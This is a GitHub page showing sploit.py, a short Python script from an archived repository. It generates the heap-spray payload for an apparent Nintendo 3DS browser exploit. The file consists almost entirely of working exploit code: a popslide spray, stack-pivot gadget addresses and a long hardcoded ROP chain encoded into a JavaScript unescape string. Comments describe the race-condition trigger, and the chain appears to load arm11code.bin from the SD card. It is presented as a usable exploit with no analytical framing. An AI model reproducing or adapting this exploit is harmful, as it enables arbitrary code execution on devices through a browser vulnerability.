This repository has been archived by the owner on Aug 12, 2021. It is now read-only.
-
Notifications
You must be signed in to change notification settings - Fork 1
/
sploit.py
44 lines (32 loc) · 4.38 KB
/
sploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
import os,sys,random,struct
#this script generates the 'var a=unescape(" ...' unicode string used in index.html (and sprayed 400 times). this is the main exploit handling code.
#the below line in frame.html is what triggers the exploit
#parent.document.documentElement.lastChild.appendChild(parent.document.adoptNode(document.getElementsByTagName("div")[0]));
#note that this exploit is timing sensitive (race condition) so slight alterations of anything can lead to different outcomes.
iter=0x10000
payload=[]
for i in range(0,iter,4):
payload.append(0x00105788) #popslide
payload[0xb90//4]=0x00e1f804 #r0 setup gadget for stack pivot:
payload[0xbec//4]=0x08bbc080 #stack pivot base addr
payload[0xc80//4]=0x08bbc080 #''
payload[0xe04//4]=0x00130efc #stack pivot
payload[0xcb4//4]=0x08bbc210 #rop heap addr
payload[0xcb8//4]=0x88888888 #junk lr
payload[0xcbc//4]=0x00105788 #poppc
#generated from https://github.com/yellows8/3ds_browserhax_common
rop=[0x00130f14, 0x00105788, 0x001050f4, 0x09320000, 0x019314ff, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00104098, 0x00130f14, 0x00105788, 0x001050f4, 0x00202a04, 0x09320000, 0x00000004, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x0011e114, 0x00130f14, 0x00105788, 0x001050f4, 0x18b40000, 0x00010000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x009ea308, 0x00130f14, 0x00105788, 0x001050f4, 0x09320000, 0x00000014, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x009ea308, 0x00130f14, 0x00105788, 0x0018dbe4, 0x09320010, 0x00640073, 0x0063006d, 0x002f003a, 0x00720061, 0x0031006d, 0x00630031, 0x0064006f, 0x002e0065, 0x00690062, 0x0000006e, 0x00000000, 0x00000000, 0x001bc690, 0x00130f14, 0x00105788, 0x001050f4, 0x09320040, 0x09320014, 0x00000030, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x009ea190, 0x00130f14, 0x00105788, 0x001050f4, 0x09320000, 0x09320040, 0x00000001, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x0022ffb0, 0x001a01f0, 0x00000000, 0x00130f14, 0x00105788, 0x001050f4, 0x09320000, 0x09320020, 0x18b41000, 0x00008000, 0x00000000, 0x00000000, 0x00000000, 0x001698bc, 0x001a01f0, 0x00000000, 0x0010c330, 0x09320000, 0x00130f14, 0x00105788, 0x0011169c, 0x00130f14, 0x00105788, 0x00101e78, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x001fdb78, 0x00130f14, 0x00105788, 0x001050f4, 0x18b41000, 0x00008000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00192568, 0x00130f14, 0x00105788, 0x0018dbe4, 0x09320010, 0x00000000, 0x00152c48, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x0023c844, 0x0011dd0c, 0x00192568, 0x0022ffb0, 0x001fdb78, 0x0020757c, 0x001bc690, 0x00130f14, 0x00105788, 0x001050f4, 0x18b40000, 0x09320014, 0x00000030, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x009ea190, 0x00130f14, 0x00105788, 0x0018dbe4, 0x09320010, 0x00000000, 0x001698bc, 0x00169944, 0x0011e114, 0x00000000, 0x00000000, 0x00000040, 0x00000000, 0x00000000, 0x00000000, 0x003dd72c, 0x00000114, 0x001bc690, 0x00130f14, 0x00105788, 0x001050f4, 0x18b40030, 0x09320014, 0x00000030, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x009ea190, 0x00130f14, 0x00105788, 0x0018dbe4, 0x09320010, 0x00000000, 0x18b41000, 0x007e83bc, 0x009eae98, 0x009eaea0, 0x009eaec8, 0x009eaa28, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x001bc690, 0x00130f14, 0x00105788, 0x001050f4, 0x18b40060, 0x09320014, 0x00000030, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x009ea190, 0x00130f14, 0x001050f4, 0x001050f4, 0x18b41000, 0x193a56e0, 0x00008000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x0011dd0c, 0x00000000, 0x00000000, 0x00000000, 0x00000008, 0x00000000, 0x00000000, 0x00000000, 0x00130f14, 0x00105788, 0x001050f4, 0x3b9aca00, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x001041c8, 0x00130f14, 0x00105788, 0x001050f4, 0x09320000, 0x01808080, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00104098, 0x00130f14, 0x001050f4, 0x001050f4, 0x00202a04, 0x09320000, 0x00000004, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x0011e114, 0x18b40000, 0x0fff9000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00130f14, 0x00105788, 0x007e86e0, 0x70707070]
for i in range(len(rop)):
payload[0xe10//4 + i]=rop[i]
st='var a=unescape("'
for i in range(0,iter,4):
r=payload[i//4]
#r=random.randint(0,0xffffffff)
lo=r&0xffff
hi=r>>16
st+=("\\u%04X\\u%04X" % (lo,hi))
st+='");'
print(st)
with open("un1.txt","w") as f:
f.write(st)
#531c 531C